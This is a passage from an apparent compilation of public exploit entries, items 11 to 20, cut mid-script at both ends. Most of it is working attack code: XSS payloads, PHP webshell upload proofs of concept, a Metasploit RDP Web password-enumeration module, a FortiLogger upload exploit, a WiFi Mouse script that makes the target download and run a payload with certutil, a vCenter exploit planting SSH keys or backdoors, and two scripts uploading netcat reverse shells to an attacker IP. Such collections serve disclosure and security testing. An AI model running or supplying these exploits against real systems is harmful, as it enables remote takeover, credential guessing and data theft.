     POST /lagos_parker/parker/addcategory.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://localhost/lagos_parker/parker/addcategory.php
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 82
     Connection: close
     Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
     Upgrade-Insecure-Requests: 1

     catename=ba1man"><script>alert(document.cookie)</script>&submit=
  12. # Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)
     # Date: 2021-02-25
     # Exploit Author: [email protected]
     # Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip
     # Version: v1.0
     # Tested on: Ubuntu 20.04.2

     uploadID.php can be used to upload .php files to '/uploads/employees_ids/' without authentication.

     POC
     ---

     1) Make the following request, changing the "Host:" to your victim IP.

     POST /dashboard/uploadID.php HTTP/1.1
     Host: 192.168.1.117
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
     Accept: application/json, text/javascript, */*; q=0.01
     Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     X-Requested-With: XMLHttpRequest
     Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337
     Content-Length: 267
     DNT: 1
     Connection: close

     -----------------------------5825462663702204104870787337
     Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php"
     Content-Type: image/png

     <?php $cmd=$_GET['cmd']; system($cmd); ?>
     -----------------------------5825462663702204104870787337--

     2) You will get the response with the name of the uploaded file (upload_filename).

     HTTP/1.1 200 OK
     Server: nginx/1.18.0 (Ubuntu)
     Date: Thu, 25 Feb 2021 19:17:55 GMT
     Content-Type: text/html; charset=UTF-8
     Connection: close
     Content-Length: 77

     {"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"}

     3) Your file will be located at: http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php

     4) In this example, to run commands: http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami
  13. # Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS
     # Date: 25/02/2021
     # Exploit Author: Peithon
     # Vendor Homepage: https://github.com/eddy8/LightCMS
     # Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4
     # Version: 1.3.4
     # Tested on: latest version of Chrome, Firefox on Windows and Linux
     # CVE: CVE-2021-3355

     An issue was discovered in LightCMS v1.3.4 (https://github.com/eddy8/LightCMS/issues/18). There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords.

     --------------------------Proof of Concept-----------------------

     1. Log in to the background.
     2. Navigate to System -> `/admin/SensitiveWords/create` & add the below-shared payload as the exclusive field value.
        Payload - </span><img src=1 onerror=alert(1) /><span>
     3. Visit page `/admin/SensitiveWords`; the payload will be triggered.
  14. # Exploit Title: Triconsole 3.75 - Reflected XSS
     # Google Dork: inurl : /calendar/calendar_form.php
     # Date: 15/2/2021
     # Exploit Author: Akash Chathoth
     # Vendor Homepage: http://www.triconsole.com/
     # Software Link: http://www.triconsole.com/php/calendar_datepicker.php
     # Version: < 3.76 (14 February 2021)
     # Tested on: 3.75
     # CVE: 2021-27330

     # Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>
  15. #!/usr/bin/env python3
     # -*- coding: utf-8 -*-

     # standard modules
     from metasploit import module

     # extra modules
     DEPENDENCIES_MISSING = False
     try:
         import base64
         import itertools
         import os
         import requests
     except ImportError:
         DEPENDENCIES_MISSING = True

     # Metasploit Metadata
     metadata = {
         'name': 'Microsoft RDP Web Client Login Enumeration',
         'description': '''
             Enumerate valid usernames and passwords against a Microsoft RDP Web Client
             by attempting authentication and performing a timing based check
             against the provided username.
         ''',
         'authors': [
             'Matthew Dunn'
         ],
         'date': '2020-12-23',
         'license': 'MSF_LICENSE',
         'references': [
             {'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'},
         ],
         'type': 'single_scanner',
         'options': {
             'targeturi': {'type': 'string',
                           'description': 'The base path to the RDP Web Client install',
                           'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'},
             'rport': {'type': 'port', 'description': 'Port to target',
                       'required': True, 'default': 443},
             'domain': {'type': 'string', 'description': 'The target AD domain',
                        'required': False, 'default': None},
             'username': {'type': 'string',
                          'description': 'The username to verify or path to a file of usernames',
                          'required': True, 'default': None},
             'password': {'type': 'string',
                          'description': 'The password to try or path to a file of passwords',
                          'required': False, 'default': None},
             'timeout': {'type': 'int',
                         'description': 'Response timeout in milliseconds to consider username invalid',
                         'required': True, 'default': 1250},
             'enum_domain': {'type': 'bool',
                             'description': 'Automatically enumerate AD domain using NTLM',
                             'required': False, 'default': True},
             'verify_service': {'type': 'bool',
                                'description': 'Verify the service is up before performing login scan',
                                'required': False, 'default': True},
             'user_agent': {'type': 'string', 'description': 'User Agent string to use, defaults to Firefox',
                            'required': False,
                            'default': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
         }
     }


     def verify_service(rhost, rport, targeturi, timeout, user_agent):
         """Verify the service is up at the target URI within the specified timeout"""
         url = f'https://{rhost}:{rport}/{targeturi}'
         headers = {'Host':rhost,
                    'User-Agent': user_agent}
         try:
             request = requests.get(url, headers=headers, timeout=(timeout / 1000),
                                    verify=False, allow_redirects=False)
             return request.status_code == 200 and 'RDWeb' in request.text
         except requests.exceptions.Timeout:
             return False
         except Exception as exc:
             module.log(str(exc), level='error')
             return False


     def get_ad_domain(rhost, rport, user_agent):
         """Retrieve the NTLM domain out of a specific challenge/response"""
         domain_urls = ['aspnet_client', 'Autodiscover', 'ecp', 'EWS', 'OAB',
                        'Microsoft-Server-ActiveSync', 'PowerShell', 'rpc']
         headers = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==',
                    'User-Agent': user_agent,
                    'Host': rhost}
         session = requests.Session()
         for url in domain_urls:
             target_url = f"https://{rhost}:{rport}/{url}"
             request = session.get(target_url, headers=headers, verify=False)
             # Decode the provided NTLM Response to strip out the domain name
             if request.status_code == 401 and 'WWW-Authenticate' in request.headers and \
                     'NTLM' in request.headers['WWW-Authenticate']:
                 domain_hash = request.headers['WWW-Authenticate'].split('NTLM ')[1].split(',')[0]
                 domain = base64.b64decode(bytes(domain_hash, 'utf-8')).replace(b'\x00',b'').split(b'\n')[1]
                 domain = domain[domain.index(b'\x0f') + 1:domain.index(b'\x02')].decode('utf-8')
                 module.log(f'Found Domain: {domain}', level='good')
                 return domain
         module.log('Failed to find Domain', level='error')
         return None


     def check_login(rhost, rport, targeturi, domain, username, password, timeout, user_agent):
         """Check a single login against the RDWeb Client
         The timeout is used to specify the amount of milliseconds where a response should consider the username invalid."""
         url = f'https://{rhost}:{rport}/{targeturi}'
         body = f'DomainUserName={domain}%5C{username}&UserPass={password}'
         headers = {'Host':rhost,
                    'User-Agent': user_agent,
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'Content-Length': f'{len(body)}',
                    'Origin': f'https://{rhost}'}
         session = requests.Session()
         report_data = {'domain':domain, 'address': rhost, 'port': rport,
                        'protocol': 'tcp', 'service_name':'RDWeb'}
         try:
             request = session.post(url, data=body, headers=headers, timeout=(timeout / 1000),
                                    verify=False, allow_redirects=False)
             if request.status_code == 302:
                 module.log(f'Login {domain}\\{username}:{password} is valid!', level='good')
                 module.report_correct_password(username, password, **report_data)
             elif request.status_code == 200:
                 module.log(f'Password {password} is invalid but {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds',
                            level='good')
                 module.report_valid_username(username, **report_data)
             else:
                 module.log(f'Received unknown response with status code: {request.status_code}')
         except requests.exceptions.Timeout:
             module.log(f'Login {domain}\\{username}:{password} is invalid! No response received in {timeout} milliseconds',
                        level='error')
         except requests.exceptions.RequestException as exc:
             module.log('{}'.format(exc), level='error')
         return


     def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout, user_agent):
         """Check each username and password combination"""
         for (username, password) in list(itertools.product(usernames, passwords)):
             check_login(rhost, rport, targeturi, domain, username.strip(),
                         password.strip(), timeout, user_agent)


     def run(args):
         """Run the module, gathering the domain if desired and verifying usernames and passwords"""
         module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOSTS']))
         if DEPENDENCIES_MISSING:
             module.log('Module dependencies are missing, cannot continue', level='error')
             return

         user_agent = args['user_agent']
         # Verify the service is up if requested
         if args['verify_service']:
             service_verified = verify_service(args['RHOSTS'], args['rport'], args['targeturi'],
                                               int(args['timeout']), user_agent)
             if service_verified:
                 module.log('Service is up, beginning scan...', level='good')
             else:
                 module.log(f'Service appears to be down, no response in {args["timeout"]} milliseconds',
                            level='error')
                 return

         # Gather AD Domain either from args or enumeration
         domain = args['domain'] if 'domain' in args else None
         if not domain and args['enum_domain']:
             domain = get_ad_domain(args['RHOSTS'], args['rport'], user_agent)

         # Verify we have a proper domain
         if not domain:
             module.log('Either domain or enum_domain must be set to continue, aborting...',
                        level='error')
             return

         # Gather usernames and passwords for enumeration
         if os.path.isfile(args['username']):
             with open(args['username'], 'r') as file_contents:
                 usernames = file_contents.readlines()
         else:
             usernames = [args['username']]
         if 'password' in args and os.path.isfile(args['password']):
             with open(args['password'], 'r') as file_contents:
                 passwords = file_contents.readlines()
         elif 'password' in args and args['password']:
             passwords = [args['password']]
         else:
             passwords = ['wrong']

         # Check each valid login combination
         check_logins(args['RHOSTS'], args['rport'], args['targeturi'], domain,
                      usernames, passwords, int(args['timeout']), user_agent)


     if __name__ == '__main__':
         module.run(metadata, run)
  16. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FortiLogger Arbitrary File Upload Exploit',
        'Description' => %q{
          This module exploits an unauthenticated arbitrary file upload via insecure POST request.
          It has been tested on version 4.4.2.2 in Windows 10 Enterprise.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Berkan Er <[email protected]>' # Vulnerability discovery, PoC and Metasploit module
        ],
        'References' => [
          ['CVE', '2021-3378'],
          ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
        ],
        'Platform' => ['win'],
        'Privileged' => false,
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'FortiLogger - 4.4.2.2',
            {
              'Platform' => 'win'
            }
          ],
        ],
        'DisclosureDate' => '2021-02-26',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(5000),
        OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])
      ],
      self.class
    )
  end

  def check_product_info
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
      'method' => 'POST',
      'data' => '',
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language' => 'en-US,en;q=0.5',
        'Accept-Encoding' => 'gzip, deflate',
        'X-Requested-With' => 'XMLHttpRequest'
      }
    )
    return res
  end

  def check
    res = check_product_info
    # Without a 200 response nothing can be concluded about the target
    return Exploit::CheckCode::Unknown unless res && res.code == 200

    if JSON.parse(res.body)['Version'] == '4.4.2.2'
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def create_payload
    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
  end

  def exploit
    print_good('Generate Payload !')
    data = create_payload

    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
    post_data = "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n"
    post_data << "Content-Type: image/png\r\n"
    post_data << "\r\n#{data}\r\n"
    post_data << "--#{boundary}\r\n"

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
      'ctype' => "multipart/form-data; boundary=#{boundary}",
      'data' => post_data,
      'headers' => {
        'Accept' => 'application/json',
        'Accept-Language' => 'en-US,en;q=0.5',
        'X-Requested-With' => 'XMLHttpRequest'
      }
    )

    if res && res.code == 200
      if JSON.parse(res.body)['Message'] == 'Error in saving file'
        print_error('Error for upload payload..')
      else
        print_good('Payload has been uploaded !')
        handler
        print_status('Executing payload...')
        send_request_cgi({
          'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
          'method' => 'GET'
        }, 5)
      end
    end
  end
end
  17. # Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution
# Date: 25-02-2021
# Author: H4rk3nz0
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.7.8.5
# Tested on: Windows Enterprise Build 17763

# The desktop server software used by the mobile app has a PIN option which does not prevent command input.
# The connection response will be 'needpassword', which is only interpreted by the mobile app and prompts for PIN input.

#!/usr/bin/python3
# Ported from the original Python 2 script: str.decode("hex") is replaced by bytes.fromhex(),
# and sendto() on the connected TCP socket is replaced by the equivalent sendall().
from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import sys

target = socket(AF_INET, SOCK_STREAM)
port = 1978

try:
    rhost = sys.argv[1]
    lhost = sys.argv[2]
    payload = sys.argv[3]
except IndexError:
    print("USAGE: python " + sys.argv[0] + " <target-ip> <local-http-server-ip> <payload-name>")
    sys.exit()

# Printable character -> hex byte, used to build the 'utf8 <byte>' keystroke packets
characters = {
    "A": "41", "B": "42", "C": "43", "D": "44", "E": "45", "F": "46", "G": "47", "H": "48", "I": "49", "J": "4a",
    "K": "4b", "L": "4c", "M": "4d", "N": "4e", "O": "4f", "P": "50", "Q": "51", "R": "52", "S": "53", "T": "54",
    "U": "55", "V": "56", "W": "57", "X": "58", "Y": "59", "Z": "5a",
    "a": "61", "b": "62", "c": "63", "d": "64", "e": "65", "f": "66", "g": "67", "h": "68", "i": "69", "j": "6a",
    "k": "6b", "l": "6c", "m": "6d", "n": "6e", "o": "6f", "p": "70", "q": "71", "r": "72", "s": "73", "t": "74",
    "u": "75", "v": "76", "w": "77", "x": "78", "y": "79", "z": "7a",
    "1": "31", "2": "32", "3": "33", "4": "34", "5": "35", "6": "36", "7": "37", "8": "38", "9": "39", "0": "30",
    " ": "20", "+": "2b", "=": "3d", "/": "2f", "_": "5f", "<": "3c", ">": "3e", "[": "5b", "]": "5d", "!": "21",
    "@": "40", "#": "23", "$": "24", "%": "25", "^": "5e", "&": "26", "*": "2a", "(": "28", ")": "29", "-": "2d",
    "'": "27", '"': "22", ":": "3a", ";": "3b", "?": "3f", "`": "60", "~": "7e", "\\": "5c", "|": "7c", "{": "7b",
    "}": "7d", ",": "2c", ".": "2e"}


def openCMD():
    # openfile /C/Windows/System32/cmd.exe
    target.sendall(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"))


def SendString(text):
    # Sends each character's hex with packet padding ('utf8 <hex>\n')
    for char in text:
        target.sendall(bytes.fromhex("7574663820" + characters[char] + "0a"))
        sleep(0.03)


def SendReturn():
    # 'key 3RTN' - Similar to 'Remote Mouse' mobile app
    target.sendall(bytes.fromhex("6b657920203352544e"))
    sleep(0.5)


def exploit():
    print("[+] 3..2..1..")
    sleep(2)
    openCMD()
    print("[+] *Super fast hacker typing*")
    sleep(1)
    SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload)
    SendReturn()
    print("[+] Retrieving payload")
    sleep(3)
    SendString("C:\\Windows\\Temp\\" + payload)
    SendReturn()
    print("[+] Done! Check Your Listener?")


def main():
    target.connect((rhost, port))
    exploit()
    target.close()
    sys.exit()


if __name__ == "__main__":
    main()
  18. # Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload
# Date: 2021-02-27
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html
# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)
# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds
# CVE: CVE-2021-21972

#!/usr/bin/env python3
'''
    Copyright 2021 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    File name CVE-2021-21972.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
    CVE-2021-21972 is an unauthenticated file upload and overwrite,
    exploitation can be done via SSH public key upload or a webshell
    The webshell must be of type JSP, and its success depends heavily on the specific vCenter version

    # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister
    # A white page means vulnerable
    # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)

    # Notes:
    # * On Linux SSH key upload is always best, when SSH access is possible & enabled
    # * On Linux the upload is done as user vsphere-ui:users
    # * On Windows the upload is done as system user
    # * vCenter 6.5 <=7515524 does not contain the vulnerable component "vropspluginui"
    # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload

    This is a native implementation without requirements, written in Python 3.
    Works equally well on Windows as Linux (as MacOS, probably ;-)

    Features: vulnerability checker + exploit
'''
import os, tarfile, sys, optparse, requests
requests.packages.urllib3.disable_warnings()
lProxy = {}
SM_TEMPLATE = b'''<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <env:Body>
    <RetrieveServiceContent xmlns="urn:vim25">
      <_this type="ServiceInstance">ServiceInstance</_this>
    </RetrieveServiceContent>
  </env:Body>
</env:Envelope>'''
sURL = sFile = sRpath = sType = None

def parseArguments(options):
    global sURL, sFile, sType, sRpath, lProxy
    if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')
    sURL = options.url
    if sURL[-1:] == '/': sURL = sURL[:-1]
    if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL
    sFile = options.file
    if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)
    sType = 'ssh'
    if options.type: sType = options.type
    if options.rpath: sRpath = options.rpath
    else: sRpath = None
    if options.proxy: lProxy = {'https': options.proxy}

def getVersion(sURL):
    def getValue(sResponse, sTag = 'vendor'):
        try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]
        except: pass
        return ''
    oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)
    #print(oResponse.text)
    if oResponse.status_code == 200:
        sResult = oResponse.text
        if not 'VMware' in getValue(sResult, 'vendor'): exit('[-] Not a VMware system: ' + sURL)
        else:
            sName = getValue(sResult, 'name')
            sVersion = getValue(sResult, 'version') # e.g. 7.0.0
            sBuild = getValue(sResult, 'build') # e.g. 15934073
            sFull = getValue(sResult, 'fullName')
            print('[+] Identified: ' + sFull)
            return sVersion, sBuild
    exit('[-] Not a VMware system: ' + sURL)

def verify(sURL):
    #return True
    sURL += '/ui/vropspluginui/rest/services/uploadova'
    try: oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)
    except: exit('[-] System not available: ' + sURL)
    if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely
    else: return False

def createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):
    def getResourcePath():
        oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)
        return oResponse.text.split('static/')[1].split('/')[0]
    oTar = tarfile.open('payloadLin.tar','w')
    if sRpath: ## version & build not important
        if sRpath[0] == '/': sRpath = sRpath[1:]
        sPayloadPath = '../../' + sRpath
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
        return 'absolute'
    elif sType.lower() == 'ssh': ## version & build not important
        sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
        return 'ssh'
    elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):
        ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber
        sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)
        print('[!] Selected uploadpath: ' + sPayloadPath[5:])
        for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)
        oTar.close()
        return 'webshell'
    elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):
        ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>
        sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)
        print('[!] Selected uploadpath: ' + sPayloadPath[5:])
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
        return 'backdoor'
    else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):
        ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)
        sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)
        print('[!] Selected uploadpath: ' + sPayloadPath[5:])
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
        return 'backdoor'

def createTarWin(sFile, sRpath = None):
    ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows
    if sRpath:
        if sRpath[0] == '/': sRpath = sRpath[1:] ## strip the leading slash (the original used [:1], which kept only the slash)
        sPayloadPath = '../../' + sRpath
    else:
        sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)
    oTar = tarfile.open('payloadWin.tar','w')
    oTar.add(sFile, arcname=sPayloadPath)
    oTar.close()

def uploadFile(sURL, sUploadType, sFile):
    #print('[!] Uploading ' + sFile)
    sFile = os.path.basename(sFile)
    sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'
    arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}
    ## Linux
    oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)
    if oResponse.status_code == 200:
        if oResponse.text == 'SUCCESS':
            print('[+] Linux payload uploaded successfully.')
            if sUploadType == 'ssh':
                print('[+] SSH key installed for user \'vsphere-ui\'.')
                print('    Please run \'ssh vsphere-ui@' + sURL.replace('https://','') + '\'')
                return True
            elif sUploadType == 'webshell':
                sWebshell = sURL + '/ui/resources/' + sFile
                #print('testing ' + sWebshell)
                oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)
                if oResponse.status_code != 404:
                    print('[+] Webshell verified, please visit: ' + sWebshell)
                    return True
            elif sUploadType == 'backdoor':
                sWebshell = sURL + '/ui/resources/' + sFile
                print('[+] Backdoor ready, please reboot or wait for a reboot')
                print('    then open: ' + sWebshell)
            else: ## absolute
                pass
    ## Windows
    arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}
    oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)
    if oResponse.status_code == 200:
        if oResponse.text == 'SUCCESS':
            print('[+] Windows payload uploaded successfully.')
            if sUploadType == 'backdoor':
                print('[+] Absolute upload looks OK')
                return True
            else:
                sWebshell = sURL + '/statsreport/' + sFile
                oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)
                if oResponse.status_code != 404:
                    print('[+] Webshell verified, please visit: ' + sWebshell)
                    return True
    return False

if __name__ == "__main__":
    usage = (
        'Usage: %prog [option]\n'
        'Exploiting Windows & Linux vCenter Server\n'
        'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \'\'\n'
        'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\n'
        'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')
    parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')
    parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')
    parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')
    parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')
    (options, args) = parser.parse_args()
    parseArguments(options)

    ## Verify
    if verify(sURL): print('[+] Target vulnerable: ' + sURL)
    else: exit('[-] Target not vulnerable: ' + sURL)

    ## Read out the version
    sVersion, sBuild = getVersion(sURL)

    if sRpath: print('[!] Ready to upload your file to ' + sRpath)
    elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \'' + sFile + '\'')
    else: print('[!] Ready to upload webshell \'' + sFile + '\'')
    sAns = input('[?] Want to exploit? [y/N]: ')
    if not sAns or not sAns[0].lower() == 'y': exit()

    ## Create TAR file
    sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)
    if not sUploadType == 'ssh': createTarWin(sFile, sRpath)

    ## Upload and verify
    uploadFile(sURL, sUploadType, sFile)

    ## Cleanup (payloadWin.tar only exists for non-ssh uploads)
    os.remove('payloadLin.tar')
    if os.path.exists('payloadWin.tar'): os.remove('payloadWin.tar')
  19. # Exploit Title: Online Catering Reservation System 1.0 - Unauthenticated Remote Code Execution
# Date: 28-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11355/online-catering-reservation.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86

# --- Description --- #
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.

# --- Proof of concept --- #
#!/usr/bin/python3

import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

def file_upload(target_ip, attacker_ip, attacker_port):
    random_file_name = str(random.randint(100000, 999999)) + "revshell.php"
    revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
    m = MultipartEncoder(fields={'id': '1337', 'menu': 'PWN', 'cat': '1337', 'subcat': 'PWN', 'desc': 'PWN', 'price': '13.37',
                                 'image': (random_file_name, revshell_string, 'application/x-php'), 'update': ''})
    print("(+) Uploading php reverse shell..")
    r1 = requests.post('http://{}/reservation/admin/menu_update.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
    if "Successfully updated menu details!" in r1.text:
        print("(+) File upload seems to have been successful!")
        return random_file_name
    else:
        print("(-) Oh no, file upload seems to have failed.. quitting.")
        exit()

def trigger_shell(target_ip, filename):
    url = 'http://{}/reservation/images/{}'.format(target_ip, filename)
    print("(+) Now trying to trigger our shell by requesting {} ..".format(url))
    r2 = requests.get(url)
    return None

def main():
    if len(sys.argv) != 4:
        print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
        print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
        sys.exit(-1)
    target_ip = sys.argv[1]
    attacker_ip = sys.argv[2]
    attacker_port = sys.argv[3]
    uploaded_filename = file_upload(target_ip, attacker_ip, attacker_port)
    trigger_shell(target_ip, uploaded_filename)
    print("\n(+) done!")

if __name__ == "__main__":
    main()
  20. # Exploit Title: Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 28-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86

# --- Description --- #
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.

# --- Proof of concept --- #
#!/usr/bin/python3

import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

def file_upload(target_ip, attacker_ip, attacker_port):
    random_file_name = str(random.randint(100000, 999999)) + "revshell.php"
    revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
    m = MultipartEncoder(fields={'name': 'PWNED', 'img': (random_file_name, revshell_string, 'application/x-php')})
    print("(+) Uploading php reverse shell..")
